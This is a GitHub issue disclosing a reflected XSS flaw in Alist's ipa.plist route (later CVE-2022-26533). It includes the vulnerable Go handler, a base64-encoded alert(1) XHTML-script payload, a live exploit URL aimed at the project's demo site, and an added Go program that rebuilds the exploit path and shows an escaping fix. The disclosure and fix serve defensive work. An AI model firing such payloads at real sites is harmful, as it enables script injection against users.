
Alist has Cross Site Scripting (XSS) vulnerability #645

Closed
Le0nsec opened this issue Mar 1, 2022 · 3 comments
Labels
vulnerability A defect in software that could allow an attacker to gain control of a system

Comments

Le0nsec commented Mar 1, 2022

Alist Version

v2.0.10-v2.1.0

Describe the bug

Vulnerability Introduction

A route in Alist uses a user-supplied parameter when rendering an XML file and does not filter it, which allows XSS.

Vulnerability affects version: v2.0.10-v2.1.0

Vulnerability Analysis

A new route was added in Alist v2.0.10: /i/:data/ipa.plist, which lets the user control the data parameter in the path.


Simplified code:

```go
package main

import (
	"encoding/base64"
	"fmt"
	"strings"

	"github.com/gin-gonic/gin"
)

// Plist handles GET /i/:data/ipa.plist (simplified excerpt of the vulnerable handler).
// "common" is Alist's own helper package; its import is omitted from this excerpt.
func Plist(c *gin.Context) {
	// The caller controls :data. Undo the URL-safe substitutions, then base64-decode.
	data := c.Param("data")
	data = strings.ReplaceAll(data, "_", "/")
	data = strings.ReplaceAll(data, "-", "=")
	bytes, err := base64.StdEncoding.DecodeString(data)
	if err != nil {
		common.ErrorResp(c, err, 500)
		return
	}
	u := string(bytes)
	var name string // set elsewhere in the original handler; omitted from this excerpt
	// u is formatted straight into the XML body with no escaping: this is the XSS sink.
	plist := fmt.Sprintf(`<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
...
	<string>%s</string>
...
	<string>ci.nn.%s</string>
...
	<string>%s</string>
...
`, u, name, name)
	c.Header("Content-Type", "application/xml;charset=utf-8")
	c.Status(200)
	_, _ = c.Writer.WriteString(plist)
}
```

The incoming data is decoded after the replacements restore the base64 characters that conflict with URL syntax, and then the parameter u is spliced directly into the output, so we can use this to construct an XSS payload.

<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>

The payload, base64-encoded, is as follows:

PGE6c2NyaXB0IHhtbG5zOmE9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkveGh0bWwiPmFsZXJ0KDEpPC9hOnNjcmlwdD4=

Replace = with -, then splice it into the path:

http(https)://<host:port>/i/PGE6c2NyaXB0IHhtbG5zOmE9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkveGh0bWwiPmFsZXJ0KDEpPC9hOnNjcmlwdD4-/ipa.plist

Vulnerability Exploitation

After a successful local exploit, try it against the official demo site:

Reproduction link

https://alist.xhofe.top/i/PGE6c2NyaXB0IHhtbG5zOmE9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkveGh0bWwiPmFsZXJ0KDEpPC9hOnNjcmlwdD4-/ipa.plist

Logs

No response
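To make the decode-and-splice chain above concrete, here is an added, self-contained Go example. It is not Alist's code and not the fix that was later committed: it rebuilds the exploit path from the report's payload exactly the way the report does (standard base64, then "/" to "_" and "=" to "-"), serves the route with net/http standing in for gin, and contrasts the verbatim splice with a hardened variant that escapes the decoded value with encoding/xml. The cut-down plist skeleton and the PlistHandler/Fetch helpers are assumptions made for the example.

```go
package main

import (
	"bytes"
	"encoding/base64"
	"encoding/xml"
	"fmt"
	"net/http"
	"net/http/httptest"
	"strings"
)

// XSSPayload is the payload from the report (constructed sample input). The XHTML
// namespace makes a browser that renders the XML document execute the script element.
const XSSPayload = `<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>`

// EncodePathParam inverts the handler's decoding step: standard base64, then
// "/" -> "_" and "=" -> "-" so the value fits in one URL path segment.
func EncodePathParam(u string) string {
	s := base64.StdEncoding.EncodeToString([]byte(u))
	s = strings.ReplaceAll(s, "/", "_")
	return strings.ReplaceAll(s, "=", "-")
}

// DecodePathParam mirrors the vulnerable handler: restore "/" and "=", then base64-decode.
func DecodePathParam(data string) (string, error) {
	data = strings.ReplaceAll(data, "_", "/")
	data = strings.ReplaceAll(data, "-", "=")
	b, err := base64.StdEncoding.DecodeString(data)
	if err != nil {
		return "", err
	}
	return string(b), nil
}

// ExploitPath builds the request path the report uses for an arbitrary decoded value.
func ExploitPath(u string) string {
	return "/i/" + EncodePathParam(u) + "/ipa.plist"
}

// plistSkeleton is an assumed, cut-down plist body with one attacker-influenced <string>.
const plistSkeleton = `<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict><key>url</key><string>%s</string></dict></plist>
`

// RenderPlistUnsafe reproduces the defect: the decoded value is spliced in verbatim.
func RenderPlistUnsafe(u string) string {
	return fmt.Sprintf(plistSkeleton, u)
}

// RenderPlistSafe is one hardened form (an assumption, not Alist's actual patch):
// encoding/xml escapes "<", ">", "&" and quotes so the value cannot open new markup.
func RenderPlistSafe(u string) (string, error) {
	var buf bytes.Buffer
	if err := xml.EscapeText(&buf, []byte(u)); err != nil {
		return "", err
	}
	return fmt.Sprintf(plistSkeleton, buf.String()), nil
}

// PlistHandler serves GET /i/{data}/ipa.plist with net/http standing in for the gin route.
// escape=false behaves like the reported versions; escape=true like the hardened one.
func PlistHandler(escape bool) http.HandlerFunc {
	return func(w http.ResponseWriter, r *http.Request) {
		parts := strings.Split(strings.Trim(r.URL.Path, "/"), "/")
		if len(parts) != 3 || parts[0] != "i" || parts[2] != "ipa.plist" {
			http.NotFound(w, r)
			return
		}
		u, err := DecodePathParam(parts[1])
		if err != nil {
			http.Error(w, err.Error(), http.StatusBadRequest)
			return
		}
		body := RenderPlistUnsafe(u)
		if escape {
			if body, err = RenderPlistSafe(u); err != nil {
				http.Error(w, err.Error(), http.StatusInternalServerError)
				return
			}
		}
		// Same content type as the original handler: browsers render it as an XML document.
		w.Header().Set("Content-Type", "application/xml;charset=utf-8")
		w.WriteHeader(http.StatusOK)
		_, _ = w.Write([]byte(body))
	}
}

// Fetch runs one in-memory GET against a handler and returns status and body.
func Fetch(h http.Handler, path string) (int, string) {
	rec := httptest.NewRecorder()
	h.ServeHTTP(rec, httptest.NewRequest(http.MethodGet, path, nil))
	return rec.Code, rec.Body.String()
}

func main() {
	path := ExploitPath(XSSPayload)
	fmt.Println("exploit path:", path)
	_, vuln := Fetch(PlistHandler(false), path)
	_, safe := Fetch(PlistHandler(true), path)
	fmt.Println("vulnerable response carries raw <a:script>:", strings.Contains(vuln, "<a:script"))
	fmt.Println("hardened response carries raw <a:script>:", strings.Contains(safe, "<a:script"))
}
```

Escaping at the sink is the minimal fix; since the value is meant to be a URL, a stricter handler would additionally parse it with net/url and reject anything that is not an absolute http(s) URL, which removes the need to trust the escaping alone.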

xhofe added the vulnerability label Mar 1, 2022

xhofe (Collaborator) commented Mar 1, 2022

Thanks for the report, and I'll fix it in the next release.

Thiasap commented Mar 1, 2022

Impressive, boss.

xhofe moved this to Todo in Alist Mar 1, 2022
xhofe added this to Alist Mar 1, 2022
xhofe moved this from Todo to In Progress in Alist Mar 1, 2022
xhofe closed this as completed in 6af17e2 Mar 3, 2022
Repository owner moved this from In Progress to Done in Alist Mar 3, 2022
Le0nsec (Author) commented Mar 12, 2022

I applied for a CVE with the number CVE-2022-26533.
